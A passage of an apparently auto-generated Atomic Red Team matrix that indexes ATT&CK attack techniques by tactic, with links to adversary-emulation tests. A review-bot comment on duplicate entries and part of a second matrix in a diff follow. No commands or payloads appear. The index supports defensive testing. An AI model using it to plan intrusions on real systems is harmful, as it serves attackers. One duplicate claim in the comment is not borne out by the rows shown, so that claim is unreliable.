| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
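Review bot: the generated matrix in this hunk lists the same technique more than once within a single column, which suggests the doc generator is keying rows on display name rather than on technique ID and is not de-duplicating per tactic; in the rows shown, "Spearphishing via Service" appears in two initial-access rows, "Disk Content Wipe" and "Transmitted Data Manipulation" each appear twice under impact, and "Dylib Hijacking" appears twice under persistence and twice under privilege-escalation. The same root cause shows up as one technique being rendered both as a link to its atomic page and as a [CONTRIBUTE A TEST] placeholder in the same column (persistence has both "Kernel Modules and Extensions [CONTRIBUTE A TEST]" and "[Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)"), which tells a reader a test is both present and missing. Please de-duplicate on technique ID in the generator so each (tactic, technique) pair is emitted once, with the link winning over the placeholder when an atomic exists.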
-233
View File
@@ -1,233 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
